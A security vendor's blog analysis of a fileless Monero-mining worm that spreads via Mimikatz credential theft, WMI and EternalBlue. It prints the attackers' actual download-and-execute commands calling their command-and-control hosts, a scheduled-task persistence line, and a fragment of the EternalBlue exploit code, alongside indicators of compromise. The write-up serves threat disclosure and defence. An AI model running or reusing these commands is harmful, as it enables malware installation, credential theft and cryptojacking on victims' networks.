Fileless Monero WannaMine, a new attack discovered by PandaLabs

 

Mining cryptocurrencies like Bitcoin, Ethereum or Monero is nothing new. In fact, in recent years we have seen numerous attacks whose main objective is the installation of mining software. For example, it is worth remembering that before WannaCry, we had already seen attackers use the NSA EternalBlue exploit to infiltrate companies and install this type of software on their victims’ devices.

It’s safe to say that it is a booming business, as sophistication of the attacks continues to increase. A few days ago we detected a new worm that uses both hacking tools and scripts to spread through corporate networks and mine the Monero cryptocurrency in any network it makes its way into.

With Adaptive Defense, we monitor all running processes in real time on every computer where it is installed. When our Threat Hunting team observed the following command attempting to execute through one of the processes on one computer, alarms were raised:

cmd /v:on /c for /f “tokens=2 delims=.[” %i in (‘ver’) do (set a=%i)&if !a:~-1!==5 (@echo on error resume next>%windir%\11.vbs&@echo Set ox=CreateObject^(“MSXML2.XMLHTTP”^)>>%windir%\11.vbs&@echo ox.open “GET”,”http://stafftest.firewall-gateway.com:8000/info.vbs“,false>>%windir%\11.vbs&@echo ox.setRequestHeader “User-Agent”, “-“>>%windir%\11.vbs&@echo ox.send^(^)>>%windir%\11.vbs&@echo If ox.Status=200 Then>>%windir%\11.vbs&@echo Set oas=CreateObject^(“ADODB.Stream”^)>>%windir%\11.vbs&@echo oas.Open>>%windir%\11.vbs&@echo oas.Type=1 >>%windir%\11.vbs&@echo oas.Write ox.ResponseBody>>%windir%\11.vbs&@echo oas.SaveToFile “%windir%\info.vbs”,2 >>%windir%\11.vbs&@echo oas.Close>>%windir%\11.vbs&@echo End if>>%windir%\11.vbs&@echo Set os=CreateObject^(“WScript.Shell”^)>>%windir%\11.vbs&@echo os.Exec^(“cscript.exe %windir%\info.vbs”^)>>%windir%\11.vbs&cscript.exe %windir%\11.vbs) else (powershell -NoP -NonI -W Hidden “if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains(’64’)){IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info6.ps1′)}else{IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info3.ps1′)}“)

Analysis of Network Propagation

Soon after beginning our investigation from PandaLabs, we observed how the attackers, knowing that they’d been discovered, closed off command and control servers, but before they could we were able to download the following files:

  • b6fcd1223719c8f6daf4ab7fbeb9a20a            ps1 ~4MB
  • 27e4f61ee65668d4c9ab4d9bf5d0a9e7 vbs ~2MB

They are two highly obfuscated scripts. “Info6.ps1” loads a Mimikatz module (dll) in a reflectively (leaving the disk untouched) so that it can steal credentials. These credentials will be used later to move laterally on internal (unprotected) networks.

The script implements, in Powershell, the famous NetBios exploit, known as EternalBlue (MS17-010), so that it can proceed to infect other not-yet-patched Windows computers on the network.

$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
[byte[]]$feaList=[byte[]](0x00,0x00,0x01,0x00)
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00

At the same time it makes use of WMI to remotely execute commands. Once the passwords for a computer are obtained, we see the “wmiprvse.exe” process on that computer execute a command line similar to the following:

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad…

If we decode the “base 64” of this command line, we obtain the script shown in Annex I.

Persistence in the System

Within one of the scripts, the following command can be found to achieve persistence in the system:

cmd /c echo powershell -nop “$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(‘SCM Event Filter’)))) {IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.spdns.eu:8000/mate6.ps1’)}” >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR “%temp%\y1.bat” &&SCHTASKS /run /TN yastcat

As you can see, it programs a daily task that downloads and executes the “y1.bat” file.

Note that we do not have this file at our disposition, as the command and control servers are currently offline.

Infection Vector 

We still do not know the initial infection vector, since networks on which we detected and blocked the infection were in the process of deploying Adaptive Defense at that time and did not have the whole network protected with our advanced cybersecurity solution. For this reason, we have not been able to determine who the “patient zero” was and how it became compromised.

It could be a download/execution of a file/Trojan that initially activated the worm, or it could have been executed remotely using some exploit.

Command and Control Servers

From the “info6.ps1” script, we were able to obtain the following command and control servers.

  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95

Note that on October 27, 2017, these servers ceased to be operative.

118.184.48.95

107.179.67.243

stafftest.spdns.eu

stafftest.firewall-gateway.com

IOCs

  • exe ( Monero, MD5 2ad7a39b17d08b3a685d36a23bf8d196 )
  • %windir%\11.vbs
  • %windir%\info.vbs
  • %windir%\info6.ps1
  • dll
  • dll
  • Tarea programada “yastcat”
  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95

Conclusion

Once again, we are witnessing the professionalization of increasingly advanced attacks. Even when it is only a matter of installing Monero miners (and we leave aside data theft, sabotage, or espionage), attackers are using advanced techniques and sharp tactics. The fact that it is a fileless attack makes it so that a majority of traditional antivirus solutions are barely able to counteract or even detect it, and its victims can only wait for the necessary signatures to be generated (the attack is fileless, but as we have seen at one point, both the scripts and the Monero client are downloaded).

But this only serves for this particular attack, and anything that varies even slightly will be useless, not to mention that only the end of the attack is detected, without seeing how it moves through the network and compromises computers.

Since Adaptive Defense not only classifies all running processes on every computer, we are able to monitor the entire network in real time, something which is becoming increasingly necessary as attackers resort to malwareless techniques in which they abuse legitimate system tools.

Among the events we monitor, we can find:

  • Process creation and remote injection
  • Creation, modification and opening of files
  • Creation and modification of registry entries
  • Network events (communication aperture, file download, etc.)
  • Administrative events (creation of users, etc.)

We will keep you updated with any findings from our Threat Hunting, as well as the detection of any new attacks.